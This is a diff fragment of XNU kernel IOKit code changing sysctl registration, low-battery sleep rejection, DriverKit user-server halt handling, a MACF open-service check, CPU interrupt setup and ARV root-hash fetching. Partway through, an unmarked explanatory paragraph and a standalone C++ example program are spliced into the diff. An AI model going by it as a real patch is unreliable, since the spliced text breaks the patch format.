+    CTLFLAG_RD | CTLFLAG_KERN | CTLFLAG_LOCKED,
+    NULL, 0, sysctl_bootreason, "A", "");
 
 static int
 sysctl_shutdownreason SYSCTL_HANDLER_ARGS
@@ -1311,15 +1337,17 @@ sysctl_shutdownreason SYSCTL_HANDLER_ARGS
        char sr[sizeof(gShutdownReasonString)];
 
        sr[0] = '\0';
-       if (gRootDomain) {
+       if (gRootDomain && gShutdownReasonSysctlRegistered) {
                gRootDomain->copyShutdownReasonString(sr, sizeof(sr));
+       } else {
+               return ENOENT;
        }
 
        return sysctl_io_string(req, sr, 0, 0, NULL);
 }
 
 SYSCTL_PROC(_kern, OID_AUTO, shutdownreason,
-    CTLTYPE_STRING | CTLFLAG_RD | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED,
+    CTLTYPE_STRING | CTLFLAG_RD | CTLFLAG_KERN | CTLFLAG_LOCKED,
     NULL, 0, sysctl_shutdownreason, "A", "shutdownreason");
 
 static int
@@ -1341,7 +1369,7 @@ sysctl_targettype SYSCTL_HANDLER_ARGS
 }
 
 SYSCTL_PROC(_hw, OID_AUTO, targettype,
-    CTLTYPE_STRING | CTLFLAG_RD | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED,
+    CTLTYPE_STRING | CTLFLAG_RD | CTLFLAG_KERN | CTLFLAG_LOCKED,
     NULL, 0, sysctl_targettype, "A", "targettype");
 
 static SYSCTL_INT(_debug, OID_AUTO, noidle, CTLFLAG_RW, &gNoIdleFlag, 0, "");
@@ -1373,7 +1401,7 @@ sysctl_aotmetrics SYSCTL_HANDLER_ARGS
 }
 
 static SYSCTL_PROC(_kern, OID_AUTO, aotmetrics,
-    CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED | CTLFLAG_ANYBODY,
+    CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_KERN | CTLFLAG_LOCKED | CTLFLAG_ANYBODY,
     NULL, 0, sysctl_aotmetrics, "S,IOPMAOTMetrics", "");
 
 
@@ -1422,7 +1450,7 @@ sysctl_aotmodebits
 }
 
 static SYSCTL_PROC(_kern, OID_AUTO, aotmodebits,
-    CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED,
+    CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_LOCKED,
     NULL, 0, sysctl_aotmodebits, "I", "");
 
 static int
@@ -1447,7 +1475,7 @@ sysctl_aotmode
 }
 
 static SYSCTL_PROC(_kern, OID_AUTO, aotmode,
-    CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED | CTLFLAG_ANYBODY,
+    CTLTYPE_INT | CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_LOCKED | CTLFLAG_ANYBODY,
     NULL, 0, sysctl_aotmode, "I", "");
 
 //******************************************************************************
@@ -1748,24 +1776,7 @@ IOPMrootDomain::start( IOService * nub )
 
        // read swd_panic boot-arg
        PE_parse_boot_argn("swd_panic", &gSwdPanic, sizeof(gSwdPanic));
-       sysctl_register_oid(&sysctl__kern_sleeptime);
-       sysctl_register_oid(&sysctl__kern_waketime);
-       sysctl_register_oid(&sysctl__kern_willshutdown);
-       sysctl_register_oid(&sysctl__kern_iokittest);
-       sysctl_register_oid(&sysctl__debug_iokit);
-       sysctl_register_oid(&sysctl__hw_targettype);
-
-#if defined(XNU_TARGET_OS_OSX)
-       sysctl_register_oid(&sysctl__kern_progressmeterenable);
-       sysctl_register_oid(&sysctl__kern_progressmeter);
-       sysctl_register_oid(&sysctl__kern_wakereason);
-#endif /* defined(XNU_TARGET_OS_OSX) */
-       sysctl_register_oid(&sysctl__kern_consoleoptions);
-       sysctl_register_oid(&sysctl__kern_progressoptions);
-
-       sysctl_register_oid(&sysctl__kern_aotmode);
-       sysctl_register_oid(&sysctl__kern_aotmodebits);
-       sysctl_register_oid(&sysctl__kern_aotmetrics);
+       gWillShutdownSysctlRegistered = true;
 
 #if HIBERNATION
 #if defined(__arm64__)
@@ -2971,6 +2982,9 @@ IOPMrootDomain::powerChangeDone( unsigned long previousPowerState )
                        // Until the platform driver can claim its wake reasons
                        strlcat(gWakeReasonString, wakeReason->getCStringNoCopy(),
                            sizeof(gWakeReasonString));
+                       if (!gWakeReasonSysctlRegistered) {
+                               gWakeReasonSysctlRegistered = true;
+                       }
                        WAKEEVENT_UNLOCK();
                }
 
@@ -6002,6 +6016,27 @@ IOPMrootDomain::overrideOurPowerChange(
            _currentCapability, changeFlags,
            request->getTag());
 
+
+#if defined(XNU_TARGET_OS_OSX) && !DISPLAY_WRANGLER_PRESENT
+       /*
+        * ASBM sends lowBattery notifications every second until the device
+        * enters hibernation, which queues up multiple sleep requests.
+        * After the device wakes from hibernation, none of these previously
+        * queued sleep requests are valid.
+        * The lowBatteryCondition variable is set when ASBM notifies rootDomain
+        * and is cleared at the very last point in sleep.
+        * Any attempt to sleep with reason kIOPMSleepReasonLowPower without
+        * lowBatteryCondition set is therefore invalid.
+        */
+       if (REQUEST_TAG_TO_REASON(request->getTag()) == kIOPMSleepReasonLowPower) {
+               if (!lowBatteryCondition) {
+                       DLOG("Duplicate lowBattery sleep");
+                       *inOutChangeFlags |= kIOPMNotDone;
+                       return;
+               }
+       }
+#endif
+
        if ((AOT_STATE == desiredPowerState) && (ON_STATE == currentPowerState)) {
                // Assertion may have been taken in AOT leading to changePowerStateTo(AOT)
                *inOutChangeFlags |= kIOPMNotDone;
@@ -6015,15 +6050,6 @@ IOPMrootDomain::overrideOurPowerChange(
                return;
        }
 
-#if defined(XNU_TARGET_OS_OSX) && !DISPLAY_WRANGLER_PRESENT
-       if (lowBatteryCondition && (desiredPowerState < currentPowerState)) {
-               // Reject sleep requests when lowBatteryCondition is TRUE to
-               // avoid racing with the impending system shutdown.
-               *inOutChangeFlags |= kIOPMNotDone;
-               return;
-       }
-#endif
-
        if (desiredPowerState < currentPowerState) {
                if (CAP_CURRENT(kIOPMSystemCapabilityGraphics)) {
                        // Root domain is dropping power state from ON->SLEEP.
@@ -8156,23 +8182,9 @@ IOPMrootDomain::handlePowerNotification( UInt32 msg )
         * Power Emergency
         */
        if (msg & kIOPMPowerEmergency) {
-               DLOG("Low battery notification received\n");
-#if defined(XNU_TARGET_OS_OSX) && !DISPLAY_WRANGLER_PRESENT
-               // Wait for the next low battery notification if the system state is
-               // in transition.
-               if ((_systemTransitionType == kSystemTransitionNone) &&
-                   CAP_CURRENT(kIOPMSystemCapabilityCPU) &&
-                   !systemBooting && !systemShutdown && !gWillShutdown) {
-                       // Setting lowBatteryCondition will prevent system sleep
-                       lowBatteryCondition = true;
-
-                       // Notify userspace to initiate system shutdown
-                       messageClients(kIOPMMessageRequestSystemShutdown);
-               }
-#else
+               DLOG("Received kIOPMPowerEmergency");
                lowBatteryCondition = true;
                privateSleepSystem(kIOPMSleepReasonLowPower);
-#endif
        }
 
        /*
@@ -10692,9 +10704,6 @@ IOPMrootDomain::claimSystemWakeEvent(
                // Lazy registration until the platform driver stops registering
                // the same name.
                gWakeReasonSysctlRegistered = true;
-#if !defined(XNU_TARGET_OS_OSX)
-               sysctl_register_oid(&sysctl__kern_wakereason);
-#endif /* !defined(XNU_TARGET_OS_OSX) */
        }
        if (addWakeReason) {
                _systemWakeEventsArray->setObject(dict.get());
@@ -10737,8 +10746,7 @@ IOPMrootDomain::claimSystemBootEvent(
        if (!gBootReasonSysctlRegistered) {
                // Lazy sysctl registration after setting gBootReasonString
                strlcat(gBootReasonString, reason, sizeof(gBootReasonString));
-               sysctl_register_oid(&sysctl__kern_bootreason);
-               gBootReasonSysctlRegistered = true;
+               os_atomic_store(&gBootReasonSysctlRegistered, true, release);
        }
        WAKEEVENT_UNLOCK();
 }
@@ -10767,10 +10775,7 @@ IOPMrootDomain::claimSystemShutdownEvent(
        }
        strlcat(gShutdownReasonString, reason, sizeof(gShutdownReasonString));
 
-       if (!gShutdownReasonSysctlRegistered) {
-               sysctl_register_oid(&sysctl__kern_shutdownreason);
-               gShutdownReasonSysctlRegistered = true;
-       }
+       gShutdownReasonSysctlRegistered = true;
        WAKEEVENT_UNLOCK();
 }
 
index 407dd5b02e3e46e4ca8b0ea3d9972f9fd716f276..3fdec62e4b083cf607d00a7e8509acba6714d076 100644 (file)
@@ -1082,6 +1082,8 @@ PEHaltRestartInternal(unsigned int type, uint32_t details)
                                IOCPURunPlatformPanicActions(type, details);
                        }
                }
+       } else if (type == kPEPanicDiagnosticsDone) {
+               IOCPURunPlatformPanicActions(type, details);
        }
 
 skip_to_haltRestart:
index c99de88582ddfef3fcacd473db7108f78a539cd4..04b3faf949bbe293ae23c61c78f7f07178c2d44d 100644 (file)
@@ -370,6 +370,7 @@ IOService           * fSystemPowerAckTo;
 uint32_t              fSystemPowerAckRef;
 uint8_t               fSystemOff;
 uint8_t               fUserServerOff;
+uint8_t               fWaitingUserServers;
 
 void lock();
 void unlock();
@@ -4150,6 +4151,12 @@ IOServicePH::serverRemove(IOUserServer * server)
        if (idx != -1U) {
                fUserServers->removeObject(idx);
        }
+
+       if (fWaitingUserServers) {
+               fWaitingUserServers = false;
+               IOLockWakeup(gJobsLock, &fWaitingUserServers, /* one-thread */ false);
+       }
+
        unlock();
 }
 
@@ -4275,6 +4282,41 @@ IOServicePH::matchingEnd(IOService * service)
        serverAck(NULL);
 }
 
+
+void
+IOServicePH::systemHalt(void)
+{
+       OSArray * notifyServers;
+       uint64_t  deadline;
+
+       lock();
+       notifyServers = OSArray::withArray(fUserServers);
+       unlock();
+
+       if (notifyServers) {
+               notifyServers->iterateObjects(^bool (OSObject * obj) {
+                       IOUserServer * us;
+                       us = (typeof(us))obj;
+                       us->systemHalt();
+                       return false;
+               });
+               OSSafeReleaseNULL(notifyServers);
+       }
+
+       lock();
+       clock_interval_to_deadline(1000, kMillisecondScale, &deadline);
+       while (0 < fUserServers->getCount()) {
+               fWaitingUserServers = true;
+               __assert_only int waitResult =
+                   IOLockSleepDeadline(gJobsLock, &fWaitingUserServers, deadline, THREAD_UNINT);
+               assert((THREAD_AWAKENED == waitResult) || (THREAD_TIMED_OUT == waitResult));
+               if (THREAD_TIMED_OUT == waitResult) {
+                       break;
+               }
+       }
+       unlock();
+}
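
systemHalt() above notifies every user server and then waits, bounded by a one-second deadline, for fUserServers to drain. A rough userspace analogue of that bounded drain, using std::condition_variable::wait_until in place of IOLockSleepDeadline (illustrative only):

    #include <chrono>
    #include <condition_variable>
    #include <cstdio>
    #include <mutex>
    #include <thread>

    static std::mutex lock;
    static std::condition_variable cv;
    static int outstanding_servers = 2;

    static void server_exited()
    {
        std::lock_guard<std::mutex> g(lock);
        --outstanding_servers;
        cv.notify_all();
    }

    int main()
    {
        // Simulate user servers going away asynchronously.
        std::thread t1([] { std::this_thread::sleep_for(std::chrono::milliseconds(100)); server_exited(); });
        std::thread t2([] { std::this_thread::sleep_for(std::chrono::milliseconds(300)); server_exited(); });

        auto deadline = std::chrono::steady_clock::now() + std::chrono::seconds(1);
        std::unique_lock<std::mutex> g(lock);
        bool drained = cv.wait_until(g, deadline, [] { return outstanding_servers == 0; });
        std::printf("drained=%d outstanding=%d\n", drained, outstanding_servers);
        g.unlock();

        t1.join();
        t2.join();
        return 0;
    }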
+
 bool
 IOServicePH::serverSlept(void)
 {
index c022807f2129a647e46335704fa90bfc60e52975..cb13e69e26d02eec747d95f6fc72c0ea9bdd425e 100644 (file)
@@ -173,7 +173,6 @@ InitIOKit(void *dtTop)
        IOLibInit();
        OSlibkernInit();
        IOMachPortInitialize();
-       devsw_init();
 
        gIOProgressBackbufferKey  = OSSymbol::withCStringNoCopy(kIOProgressBackbufferKey);
        gIORemoveOnReadProperties = OSSet::withObjects((const OSObject **) &gIOProgressBackbufferKey, 1);
index 20d9cc3efc72b7ff6086c49e18c8f83db8bb3d57..d0e87bf2447a945d7011dc34b9d91caa2a0577f2 100644 (file)
@@ -151,6 +151,10 @@ oid_sysctl(__unused struct sysctl_oid *oidp, __unused void *arg1, int arg2, stru
        int error = EINVAL;
        uint32_t request = arg2;
 
+       if (!IOStatistics::isEnabled()) {
+               return ENOENT;
+       }
+
        switch (request) {
        case kIOStatisticsGeneral:
                error = IOStatistics::getStatistics(req);
@@ -171,17 +175,18 @@ oid_sysctl(__unused struct sysctl_oid *oidp, __unused void *arg1, int arg2, stru
 SYSCTL_NODE(_debug, OID_AUTO, iokit_statistics, CTLFLAG_RW | CTLFLAG_LOCKED, NULL, "IOStatistics");
 
 static SYSCTL_PROC(_debug_iokit_statistics, OID_AUTO, general,
-    CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED,
+    CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_KERN | CTLFLAG_LOCKED,
     NULL, kIOStatisticsGeneral, oid_sysctl, "S", "");
 
 static SYSCTL_PROC(_debug_iokit_statistics, OID_AUTO, workloop,
-    CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED,
+    CTLTYPE_STRUCT | CTLFLAG_RD | CTLFLAG_KERN | CTLFLAG_LOCKED,
     NULL, kIOStatisticsWorkLoop, oid_sysctl, "S", "");
 
 static SYSCTL_PROC(_debug_iokit_statistics, OID_AUTO, userclient,
-    CTLTYPE_STRUCT | CTLFLAG_RW | CTLFLAG_NOAUTO | CTLFLAG_KERN | CTLFLAG_LOCKED,
+    CTLTYPE_STRUCT | CTLFLAG_RW | CTLFLAG_KERN | CTLFLAG_LOCKED,
     NULL, kIOStatisticsUserClient, oid_sysctl, "S", "");
 
+
 void
 IOStatistics::initialize()
 {
@@ -194,10 +199,6 @@ IOStatistics::initialize()
                return;
        }
 
-       sysctl_register_oid(&sysctl__debug_iokit_statistics_general);
-       sysctl_register_oid(&sysctl__debug_iokit_statistics_workloop);
-       sysctl_register_oid(&sysctl__debug_iokit_statistics_userclient);
-
        lock = IORWLockAlloc();
        if (!lock) {
                return;
index 12bc47e4656212a1c29f03477d1587c145d3ceb1..6d1edda91f769008692375811c3bc3b100da0243 100644 (file)
@@ -4213,6 +4213,11 @@ is_io_service_open_extended(
                return kIOReturnBadArgument;
        }
 
+#if CONFIG_MACF
+       if (mac_iokit_check_open_service(kauth_cred_get(), service, connect_type) != 0) {
+               return kIOReturnNotPermitted;
+       }
+#endif
        do{
                if (properties) {
                        return kIOReturnUnsupported;
index 88fd179e5dad23ba1361d26860d25edd8c10d13a..ffd44f0c714ebfeaed2f4f59382d5f86e5da3eed 100644 (file)
@@ -2867,7 +2867,7 @@ IOUserServer::rpc(IORPC rpc)
                    0, &message_moved);
        } else {
                assert(replySize >= (sizeof(IORPCMessageMach) + sizeof(IORPCMessage)));
-               ret = kernel_mach_msg_rpc(&mach->msgh, sendSize, replySize, FALSE, &message_moved);
+               ret = kernel_mach_msg_rpc(&mach->msgh, sendSize, replySize, FALSE, FALSE, &message_moved);
        }
 
        ipc_port_release_send(sendPort);
@@ -3365,6 +3365,44 @@ IOUserClient * IOUserServer::withTask(task_t owningTask)
 IOReturn
 IOUserServer::clientClose(void)
 {
+       OSArray   * services;
+
+       if (kIODKLogSetup & gIODKDebug) {
+               DKLOG("%s::clientClose(%p)\n", getName(), this);
+       }
+
+       services = NULL;
+       IOLockLock(fLock);
+       if (fServices) {
+               services = OSArray::withArray(fServices);
+       }
+       IOLockUnlock(fLock);
+
+       // If this was an expected exit, termination and stop should have detached at this
+       // point, so send any provider still attached and not owned by this user server
+       // the ClientCrashed() notification.
+       if (services) {
+               services->iterateObjects(^bool (OSObject * obj) {
+                       IOService * service;
+                       IOService * provider;
+
+                       service = (IOService *) obj;
+                       if (service->isInactive()) {
+                               return false;
+                       }
+                       provider = service->getProvider();
+                       if (provider
+                       && (!provider->reserved->uvars || (provider->reserved->uvars->userServer != this))) {
+                               if (kIODKLogSetup & gIODKDebug) {
+                                       DKLOG(DKS "::ClientCrashed(" DKS ")\n", DKN(provider), DKN(service));
+                               }
+                               provider->ClientCrashed(service, 0);
+                       }
+                       return false;
+               });
+               services->release();
+       }
+
        terminate();
        return kIOReturnSuccess;
 }
@@ -3700,11 +3738,10 @@ IOUserServer::serviceNewUserClient(IOService * service, task_t owningTask, void
 
        if (!(kIODKDisableEntitlementChecking & gIODKDebug)) {
                bundleID = NULL;
-               entitlements = NULL;
+               entitlements = IOUserClient::copyClientEntitlements(owningTask);
                if (fEntitlements && fEntitlements->getObject(gIODriverKitUserClientEntitlementAllowAnyKey)) {
                        ok = true;
                } else {
-                       entitlements = IOUserClient::copyClientEntitlements(owningTask);
                        bundleID = service->copyProperty(gIOModuleIdentifierKey);
                        ok = (entitlements
                            && bundleID
@@ -4115,6 +4152,48 @@ IOUserServer::systemPower(bool powerOff)
 }
 
 
+void
+IOUserServer::systemHalt(void)
+{
+       OSArray * services;
+
+       if (true || (kIODKLogPM & gIODKDebug)) {
+               DKLOG("%s::systemHalt()\n", getName());
+       }
+
+       IOLockLock(fLock);
+       services = OSArray::withArray(fServices);
+       IOLockUnlock(fLock);
+
+       if (services) {
+               services->iterateObjects(^bool (OSObject * obj) {
+                       IOService  * service;
+                       IOService  * provider;
+                       IOOptionBits terminateOptions;
+                       bool         root;
+
+                       service = (IOService *) obj;
+                       provider = service->getProvider();
+                       if (!provider) {
+                               DKLOG("stale service " DKS " found, skipping termination\n", DKN(service));
+                               return false;
+                       }
+                       root = (NULL == provider->getProperty(gIOUserServerNameKey, gIOServicePlane));
+                       if (true || (kIODKLogPM & gIODKDebug)) {
+                               DKLOG("%d: terminate(" DKS ")\n", root, DKN(service));
+                       }
+                       if (!root) {
+                               return false;
+                       }
+                       terminateOptions = kIOServiceRequired | kIOServiceTerminateNeedWillTerminate;
+                       if (!service->terminate(terminateOptions)) {
+                               IOLog("failed to terminate service %s-0x%llx\n", service->getName(), service->getRegistryEntryID());
+                       }
+                       return false;
+               });
+       }
+       OSSafeReleaseNULL(services);
+}
 
 IOReturn
 IOUserServer::serviceStarted(IOService * service, IOService * provider, bool result)
@@ -4150,9 +4229,21 @@ IOUserServer::serviceStarted(IOService * service, IOService * provider, bool res
                pmProvider = pmProvider->getProvider();
        }
        if (pmProvider) {
+               IOService * entry;
                OSObject  * prop;
+               OSObject  * nextProp;
                OSString  * str;
-               prop = pmProvider->copyProperty("non-removable");
+
+               entry = pmProvider;
+               prop  = NULL;
+               do {
+                       nextProp = entry->copyProperty("non-removable");
+                       if (nextProp) {
+                               OSSafeReleaseNULL(prop);
+                               prop = nextProp;
+                       }
+                       entry = entry->getProvider();
+               } while (entry);
                if (prop) {
                        str = OSDynamicCast(OSString, prop);
                        if (str && str->isEqualTo("yes")) {
@@ -4287,7 +4378,7 @@ IOUserServer::serviceWillTerminate(IOService * client, IOService * provider, IOO
        }
 
        if (willTerminate) {
-               if (IOServicePH::serverSlept()) {
+               if ((true) || IOServicePH::serverSlept()) {
                        client->Stop_async(provider);
                        ret = kIOReturnOffline;
                } else {
@@ -4354,6 +4445,14 @@ IOUserServer::serviceDidStop(IOService * client, IOService * provider)
        }
 }
 
+kern_return_t
+IOService::ClientCrashed_Impl(
+       IOService * client,
+       uint64_t    options)
+{
+       return kIOReturnUnsupported;
+}
+
 kern_return_t
 IOService::Stop_Impl(
        IOService * provider)
@@ -4493,11 +4592,12 @@ IOUserUserClient::externalMethod(uint32_t selector, IOExternalMethodArguments *
        }
 
        if (MACH_PORT_NULL != args->asyncWakePort) {
+               // this retain is for the OSAction to release
+               iokit_make_port_send(args->asyncWakePort);
                kr = CreateActionKernelCompletion(sizeof(IOUserUserClientActionRef), &action);
                assert(KERN_SUCCESS == kr);
                ref = (typeof(ref))action->GetReference();
                bcopy(args->asyncReference, &ref->asyncRef[0], args->asyncReferenceCount * sizeof(ref->asyncRef[0]));
-
                kr = action->SetAbortedHandler(^(void) {
                        IOUserUserClientActionRef * ref;
                        IOReturn ret;
@@ -4528,12 +4628,14 @@ IOUserUserClient::externalMethod(uint32_t selector, IOExternalMethodArguments *
        OSSafeReleaseNULL(action);
 
        if (kIOReturnSuccess != kr) {
-               if (ref) {
-                       // mig will destroy any async port, remove our pointer to it
-                       bzero(&ref->asyncRef[0], sizeof(ref->asyncRef));
-               }
+               // mig will destroy any async port
                return kr;
        }
+       if (MACH_PORT_NULL != args->asyncWakePort) {
+               // this release is for the mig created send right
+               iokit_release_port_send(args->asyncWakePort);
+       }
+
        if (structureOutput) {
                if (args->structureVariableOutputData) {
                        *args->structureVariableOutputData = structureOutput;
index 9415e022667966cf6f092c46eb38378cb49268ba..9121b6bf65e347fe02904f2f295a69d64d07ce66 100644 (file)
@@ -37,6 +37,7 @@ extern "C" {
 
 #include <libkern/OSAtomic.h>
 #include <libkern/c++/OSCollection.h>
+#include <IOKit/IODeviceTreeSupport.h>
 #include <IOKit/IOLib.h>
 #include <IOKit/IOPlatformActions.h>
 #include <IOKit/IOPMGR.h>
@@ -81,35 +82,53 @@ idle_timer_wrapper(void */*refCon*/, uint64_t *new_timeout_ticks)
        gPMGR->updateCPUIdle(new_timeout_ticks);
 }
 
+static OSDictionary *
+matching_dict_for_cpu_id(unsigned int cpu_id)
+{
+       // The cpu-id property in EDT doesn't necessarily match the dynamically
+       // assigned logical ID in XNU, so look up the cpu node by the physical
+       // (cluster/core) ID instead.
+       OSSymbolConstPtr cpuTypeSymbol = OSSymbol::withCString("cpu");
+       OSSymbolConstPtr cpuIdSymbol = OSSymbol::withCString("reg");
+       OSDataPtr cpuId = OSData::withBytes(&(topology_info->cpus[cpu_id].phys_id), sizeof(uint32_t));
+
+       OSDictionary *propMatch = OSDictionary::withCapacity(4);
+       propMatch->setObject(gIODTTypeKey, cpuTypeSymbol);
+       propMatch->setObject(cpuIdSymbol, cpuId);
+
+       OSDictionary *matching = IOService::serviceMatching("IOPlatformDevice");
+       matching->setObject(gIOPropertyMatchKey, propMatch);
+
+       propMatch->release();
+       cpuTypeSymbol->release();
+       cpuIdSymbol->release();
+       cpuId->release();
+
+       return matching;
+}
+
 static void
 register_aic_handlers(const ml_topology_cpu *cpu_info,
     ipi_handler_t ipi_handler,
     perfmon_interrupt_handler_func pmi_handler)
 {
-       const int n_irqs = 3;
-       int i;
-       IOInterruptVectorNumber irqlist[n_irqs] = {
-               cpu_info->self_ipi_irq,
-               cpu_info->other_ipi_irq,
-               cpu_info->pmi_irq };
-
-       IOService *fakeCPU = new IOService();
-       if (!fakeCPU || !fakeCPU->init()) {
-               panic("Can't initialize fakeCPU");
-       }
+       OSDictionary *matching = matching_dict_for_cpu_id(cpu_info->cpu_id);
+       IOService *cpu = IOService::waitForMatchingService(matching, UINT64_MAX);
+       matching->release();
 
-       IOInterruptSource source[n_irqs];
-       for (i = 0; i < n_irqs; i++) {
-               source[i].vectorData = OSData::withBytes(&irqlist[i], sizeof(irqlist[0]));
+       OSArray *irqs = (OSArray *) cpu->getProperty(gIOInterruptSpecifiersKey);
+       if (!irqs) {
+               panic("Error finding interrupts for CPU %d", cpu_info->cpu_id);
        }
-       fakeCPU->_interruptSources = source;
 
-       if (cpu_info->self_ipi_irq && cpu_info->other_ipi_irq) {
+       unsigned int irqcount = irqs->getCount();
+
+       if (irqcount == 3) {
                // Legacy configuration, for !HAS_IPI chips (pre-Skye).
-               if (gAIC->registerInterrupt(fakeCPU, 0, NULL, (IOInterruptHandler)ipi_handler, NULL) != kIOReturnSuccess ||
-                   gAIC->enableInterrupt(fakeCPU, 0) != kIOReturnSuccess ||
-                   gAIC->registerInterrupt(fakeCPU, 1, NULL, (IOInterruptHandler)ipi_handler, NULL) != kIOReturnSuccess ||
-                   gAIC->enableInterrupt(fakeCPU, 1) != kIOReturnSuccess) {
+               if (cpu->registerInterrupt(0, NULL, (IOInterruptAction)ipi_handler, NULL) != kIOReturnSuccess ||
+                   cpu->enableInterrupt(0) != kIOReturnSuccess ||
+                   cpu->registerInterrupt(2, NULL, (IOInterruptAction)ipi_handler, NULL) != kIOReturnSuccess ||
+                   cpu->enableInterrupt(2) != kIOReturnSuccess) {
                        panic("Error registering IPIs");
                }
 #if !defined(HAS_IPI)
@@ -118,17 +137,14 @@ register_aic_handlers(const ml_topology_cpu *cpu_info,
                aic_ipis = true;
 #endif
        }
+
        // Conditional, because on Skye and later, we use an FIQ instead of an external IRQ.
-       if (pmi_handler && cpu_info->pmi_irq) {
-               if (gAIC->registerInterrupt(fakeCPU, 2, NULL, (IOInterruptHandler)pmi_handler, NULL) != kIOReturnSuccess ||
-                   gAIC->enableInterrupt(fakeCPU, 2) != kIOReturnSuccess) {
+       if (pmi_handler && irqcount == 1) {
+               if (cpu->registerInterrupt(1, NULL, (IOInterruptAction)pmi_handler, NULL) != kIOReturnSuccess ||
+                   cpu->enableInterrupt(1) != kIOReturnSuccess) {
                        panic("Error registering PMI");
                }
        }
-
-       for (i = 0; i < n_irqs; i++) {
-               source[i].vectorData->release();
-       }
 }
 
 static void
@@ -158,7 +174,6 @@ cpu_boot_thread(void */*unused0*/, wait_result_t /*unused1*/)
        }
        memset(machProcessors, 0, array_size);
 
-       ml_cpu_init_state();
        for (unsigned int cpu = 0; cpu < topology_info->num_cpus; cpu++) {
                const ml_topology_cpu *cpu_info = &topology_info->cpus[cpu];
                const unsigned int cpu_id = cpu_info->cpu_id;
@@ -192,6 +207,7 @@ cpu_boot_thread(void */*unused0*/, wait_result_t /*unused1*/)
                        panic("processor_start failed");
                }
        }
+       ml_cpu_init_completed();
        IOService::publishResource(gIOAllCPUInitializedKey, kOSBooleanTrue);
 }
 
@@ -221,7 +237,8 @@ PE_cpu_start(cpu_id_t target,
        unsigned int cpu_id = target_to_cpu_id(target);
 
        if (cpu_id != boot_cpu) {
-               gPMGR->enableCPUCore(cpu_id);
+               extern unsigned int LowResetVectorBase;
+               gPMGR->enableCPUCore(cpu_id, ml_vtophys((vm_offset_t)&LowResetVectorBase));
        }
        return KERN_SUCCESS;
 }
index ca0e3b8952fe30bab3f99b0492d9cbc6b67e3bef..8c71598d7517fffee543d71c689154f81be2890d 100644 (file)
@@ -54,24 +54,19 @@ static IOMemoryDescriptor* apfsKeyData = NULL;
 IOMemoryDescriptor* IOGetAPFSKeyStoreData();
 void IOSetAPFSKeyStoreData(IOMemoryDescriptor* data);
 
-static volatile UInt32 arvRootHashFetched = 0;
+static volatile UInt32 ARVRootHashFetched = 0;
 static volatile UInt32 bsARVRootHashFetched = 0;
-static IOMemoryDescriptor* arvRootHashData = NULL;
-static IOMemoryDescriptor* bsARVRootHashData = NULL;
 
 IOMemoryDescriptor* IOGetARVRootHashData(void);
-void IOSetARVRootHashData(IOMemoryDescriptor* arvData);
-
 IOMemoryDescriptor* IOGetBaseSystemARVRootHashData(void);
-bool IOBaseSystemARVRootHashAvailable(void);
-void IOSetBaseSystemARVRootHashData(IOMemoryDescriptor* arvData);
 
+bool IOBaseSystemARVRootHashAvailable(void);
 
-static volatile UInt32 arvManifestFetched = 0;
-static IOMemoryDescriptor* arvManifestData = NULL;
+static volatile UInt32 ARVManifestFetched = 0;
+static volatile UInt32 bsARVManifestFetched = 0;
 
 IOMemoryDescriptor* IOGetARVManifestData(void);
-void IOSetARVManifestData(IOMemoryDescriptor* arvData);
+IOMemoryDescriptor* IOGetBaseSystemARVManifestData(void);
 
 __END_DECLS
 
@@ -181,34 +176,15 @@ IOGetAPFSKeyStoreData()
 
 // ARV Root Hash fetcher
 
-// Store in-memory Root Hash
-void
-IOSetARVRootHashData(IOMemoryDescriptor* arvData)
-{
-       // Do not allow re-fetching of the boot_args root hash by passing NULL here.
-       if (arvData) {
-               arvRootHashData = arvData;
-               arvRootHashFetched = 0;
-       }
-}
-
-// Retrieve any root hash we may have (stored in boot_args or in-memory)
+// Retrieve any root hash we may have (stored in boot_args)
 IOMemoryDescriptor*
 IOGetARVRootHashData(void)
 {
        // Check if someone got the root hash before us
-       if (!OSCompareAndSwap(0, 1, &arvRootHashFetched)) {
+       if (!OSCompareAndSwap(0, 1, &ARVRootHashFetched)) {
                return NULL;
        }
 
-       // Do we have in-memory root hash?
-       if (arvRootHashData) {
-               IOMemoryDescriptor* arvData = arvRootHashData;
-               arvRootHashData = NULL;
-               return arvData;
-       }
-
-       // Looks like there was no in-memory root hash and it's the first call - try boot_args
        boot_args* args = (boot_args*)PE_state.bootArgs;
 
        DEBG("%s: data at address %llu size %llu\n", __func__, args->arvRootHashStart, args->arvRootHashSize);
@@ -228,68 +204,62 @@ IOGetARVRootHashData(void)
        return memoryDescriptor;
 }
 
-// Base System Analogues
+// Base System Analogue
 
 IOMemoryDescriptor*
 IOGetBaseSystemARVRootHashData(void)
 {
-       //TBD!
-       return NULL;
+       // Check if someone got the base system root hash before us
+       if (!OSCompareAndSwap(0, 1, &bsARVRootHashFetched)) {
+               return NULL;
+       }
+
+       boot_args* args = (boot_args*)PE_state.bootArgs;
+
+       DEBG("%s: data at address %llu size %llu\n", __func__, args->bsARVRootHashStart, args->bsARVRootHashSize);
+       if (args->bsARVRootHashStart == 0) {
+               return NULL;
+       }
+
+       // We have the base system root hash in the boot_args, create IOMemoryDescriptor for the blob
+       IOAddressRange ranges;
+       ranges.address = args->bsARVRootHashStart;
+       ranges.length = args->bsARVRootHashSize;
+
+       const IOOptionBits options = kIODirectionInOut | kIOMemoryTypePhysical64 | kIOMemoryMapperNone;
+
+       IOMemoryDescriptor* memoryDescriptor = IOMemoryDescriptor::withOptions(&ranges, 1, 0, NULL, options);
+       DEBG("%s: memory descriptor %p\n", __func__, memoryDescriptor);
+       return memoryDescriptor;
 }
 
 bool
